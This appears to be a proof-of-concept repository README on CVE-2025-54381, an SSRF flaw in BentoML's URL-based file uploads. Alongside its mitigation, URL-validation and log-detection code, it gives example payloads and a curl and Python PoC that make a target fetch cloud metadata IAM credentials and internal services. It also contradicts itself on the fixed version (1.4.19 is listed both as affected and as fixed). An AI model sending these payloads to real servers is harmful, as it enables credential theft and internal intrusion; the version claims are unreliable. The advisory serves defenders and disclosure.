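Related vulnerability
Title: BentoML code issue vulnerability (CVE-2025-54381)
Description: BentoML is an open-source model-serving library from BentoML, used to build high-performance, scalable AI applications in Python. BentoML versions 1.4.0 through 1.4.19 contain a code issue vulnerability: the file upload handling system does not validate user-supplied URLs, which can lead to server-side request forgery attacks.
Description
CVE-2025-54381
Introduction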
# **🔓 CVE-2025-54381 – ⚠️ Critical SSRF Vulnerability in BentoML Allows 🚨 Unauthorized Internal & Cloud Metadata Access**
---
## 📛 CVE Information
* **CVE ID:** CVE-2025-54381
* **Published Date:** July 30, 2025
* **Discovered by:** Wiz Research Team
* **Reported to GitHub Advisory Database & NVD**
* **Severity:** Critical
* **CVSS v3.1 Score:** **9.9 / 10**
---
## 📦 Affected Software
* **Product:** [BentoML](https://github.com/bentoml/BentoML) (Python-based framework for packaging, shipping, and deploying ML models)
* **Affected Versions:**
  * All versions from **1.4.0** up to and including **1.4.19**
---
## 🔍 Vulnerability Type
* **Type:** SSRF (Server-Side Request Forgery)
* **CWE Category:** CWE-918 – Server-Side Request Forgery
---
## ⚠️ Detailed Vulnerability Description
The vulnerability lies in the **URL-based file upload** feature in BentoML's model-serving APIs. Specifically, BentoML supports receiving file inputs via URLs in both:

1. **Multipart Form Requests**
2. **JSON POST Requests**

The framework then performs a **server-side HTTP GET request** to download the file **without properly validating the user-supplied URL**.
### What makes it dangerous?
The server can be tricked into:
* Accessing **internal-only services**, e.g. `http://localhost:...`, `http://127.0.0.1:...`
* Accessing **cloud metadata endpoints** like:
  * `http://169.254.169.254/latest/meta-data/` (AWS)
  * `http://metadata.google.internal/` (GCP)
* Accessing **internal IP ranges**:
  * `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`
These endpoints may expose:
* IAM credentials
* Tokens
* Service secrets
* Private APIs
* Admin dashboards
---
## 💣 Impact
| Impact Area | Description |
| ----------------------- | ------------------------------------------ |
| **Confidentiality** | High — attacker may steal internal secrets |
| **Integrity** | Low — read-only attack |
| **Availability** | Low — unlikely to crash the system |
| **Scope** | Changed — attack may reach other systems |
| **Privileges Required** | None |
| **User Interaction** | None |
---
## 🧪 Exploitation Examples
### Example 1: Accessing AWS Metadata
```json
{
  "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}
```
If the server is hosted on AWS, this fetches sensitive IAM role credentials.
---
### Example 2: Internal Reconnaissance
```json
{
  "url": "http://10.0.0.15:8080/admin"
}
```
The attacker could scan for internal services exposed only on the private network.
---
### Example 3: Localhost SSRF
```json
{
  "url": "http://127.0.0.1:9000/metrics"
}
```
This may expose services like Prometheus, Grafana, MinIO, etc.
---
## 🔧 Fix & Mitigation
### ✅ Fixed in version 1.4.19
Patch introduces:
* URL scheme validation
* IP address checking
* Blocking requests to:
  * localhost
  * internal IP ranges
  * metadata endpoints
* Additional safeguards for both JSON and multipart upload handlers
---
### 🧱 Temporary Mitigations
If you cannot upgrade:
1. **Add firewall rules** to block outbound traffic to internal networks and metadata endpoints.
2. **Use a proxy** with allowlists for outgoing requests.
3. **Implement URL filtering logic** before allowing downloads.
4. **Disable URL-based file upload** feature if not needed.
5. **Log all outbound requests** and monitor suspicious connections.
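
One way to implement the URL filtering from mitigation 3, applying the checks listed in the fix section (scheme validation, IP address checking, blocking localhost, internal ranges and metadata endpoints). This is an added example, not BentoML's patch; `validate_download_url`, `sample_resolver` and the `SAMPLE_DNS` answers are hypothetical names and constructed data.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

class BlockedURL(ValueError):
    """The URL must not be fetched from the server side."""

def system_resolver(host, port):
    # Every address the name maps to; any one may be the address connected to.
    return [ai[4][0] for ai in socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)]

def is_public(addr):
    ip = ipaddress.ip_address(addr.split("%")[0])  # drop an IPv6 zone id
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:a.b.c.d by its IPv4 address
    return ip.is_global and not ip.is_multicast  # False for loopback, RFC 1918, link-local

def validate_download_url(url, resolver=system_resolver):
    """Return the vetted addresses for url, or raise BlockedURL."""
    try:
        parts = urlsplit(url)
        scheme, host, port = parts.scheme.lower(), parts.hostname, parts.port
    except ValueError as exc:  # malformed host or port
        raise BlockedURL(f"unparseable URL: {exc}") from None
    if scheme not in ("http", "https") or not host:
        raise BlockedURL(f"scheme or host not allowed: {url!r}")
    try:
        addrs = resolver(host, port or (443 if scheme == "https" else 80))
    except OSError as exc:
        raise BlockedURL(f"cannot resolve {host}: {exc}") from None
    blocked = [a for a in addrs if not is_public(a)]
    if blocked or not addrs:
        raise BlockedURL(f"{host}: rejected, non-public answers {blocked}")
    return addrs

# Constructed DNS answers so the example runs offline (not real lookups).
SAMPLE_DNS = {
    "files.example.com": ["93.184.216.34"],
    "metadata.google.internal": ["169.254.169.254"],
    "mixed.example.com": ["93.184.216.34", "10.0.0.15"],
}

def sample_resolver(host, port):
    return SAMPLE_DNS.get(host) or [host]  # IP literals map to themselves

def is_allowed(url, resolver=sample_resolver):
    try:
        return bool(validate_download_url(url, resolver))
    except BlockedURL:
        return False
```

Connect to one of the returned addresses rather than resolving the name a second time, and disable or re-validate HTTP redirects, since either step can otherwise lead the download to a destination that was never checked.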
---
## 🧰 Detection
* Monitor logs for requests from BentoML to:
  * `169.254.169.254`
  * `127.0.0.1`
  * `10.*.*.*`, `192.168.*.*`, etc.
* Use dynamic analysis tools (DAST) to fuzz file-upload endpoints with internal URLs.
* Check for unexpected `GET` requests made from your BentoML server to unauthorized endpoints.
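
The log check described above, run over a few egress-proxy lines. This is an added example, not part of the original README; the log format, the `bento-` source naming and the sample lines are constructed assumptions, so adapt the regular expression to your own proxy or flow logs.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed egress-proxy lines: "<time> <source> <method> <url> <status>".
SAMPLE_LOG = """\
2025-07-31T09:14:02Z bento-api-1 GET https://files.example.com/img/cat.png 200
2025-07-31T09:14:07Z bento-api-1 GET http://169.254.169.254/latest/meta-data/iam/security-credentials/ 200
2025-07-31T09:14:09Z bento-api-1 GET http://127.0.0.1:9000/metrics 200
2025-07-31T09:15:40Z bento-api-2 GET http://10.0.0.15:8080/admin 403
2025-07-31T09:16:11Z bento-api-2 GET http://metadata.google.internal/ 200
2025-07-31T09:17:30Z billing-1 GET http://10.0.0.15:8080/admin 200
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
METADATA_HOSTS = {"metadata.google.internal"}
BENTO_SOURCES = ("bento-",)  # assumption: naming of BentoML hosts in this log

def classify(host):
    """Return why host is an SSRF-style destination, or None."""
    if host in METADATA_HOSTS:
        return "metadata-hostname"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None  # ordinary hostname: correlate with DNS logs instead
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    if ip.is_private:
        return "private-range"
    return None

def find_suspicious(log_text):
    """Return (time, source, url, reason, status) for flagged BentoML GETs."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, src, method, url, status = m.groups()
        if method != "GET" or not src.startswith(BENTO_SOURCES):
            continue
        reason = classify(urlsplit(url).hostname or "")
        if reason:
            hits.append((ts, src, url, reason, int(status)))
    return hits
```

The status code is kept in each hit because a `200` from a metadata or loopback destination means the fetch succeeded and any credentials served there should be treated as exposed.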
---
## 🧪 Proof of Concept (PoC)
### Basic JSON Request Exploiting SSRF
```bash
curl -X POST http://<target>:3000/upload \
  -H "Content-Type: application/json" \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'
```
### Python PoC
```python
import requests
url = "http://target-server/upload"
data = {"url": "http://169.254.169.254/latest/meta-data/"}
r = requests.post(url, json=data)
print(r.text)
```
---
## ✅ Recommended Actions for Security Teams
1. **Identify all BentoML deployments**
2. **Upgrade to 1.4.19 or later**
3. **Disable URL-based uploads** unless absolutely needed
4. **Apply egress filtering on server firewalls**
5. **Audit logs** for abnormal outbound HTTP traffic
6. **Conduct a code review** for any custom handlers using `requests.get()` or similar with user input
---
## 📚 Summary Table
| Key | Value |
| ----------------- | -------------------------------- |
| CVE ID | CVE-2025-54381 |
| Product | BentoML |
| Versions Affected | 1.4.0 – 1.4.19 |
| Vulnerability | SSRF |
| CVSS v3.1 Score | 9.9 (Critical) |
| Fixed Version | 1.4.19 |
| Exploitable by | Remote attacker (no auth needed) |
| Discovered by | Wiz Research |
---
## 🔒 Disclaimer
This content is provided **strictly for educational, ethical, and informational purposes only**. The goal is to raise awareness about CVE-2025-54381 and help developers and security professionals understand, detect, and remediate potential vulnerabilities in their systems.
**❌ Any unauthorized use of this information to exploit or harm systems without explicit permission is illegal and unethical.**
By proceeding, you agree to use this knowledge responsibly and in compliance with all applicable laws and ethical guidelines.
File snapshot
[4.0K] /data/pocs/00a0809e34923d192be6512dbc10ada5578414b8
└── [5.8K] README.md
0 directories, 1 file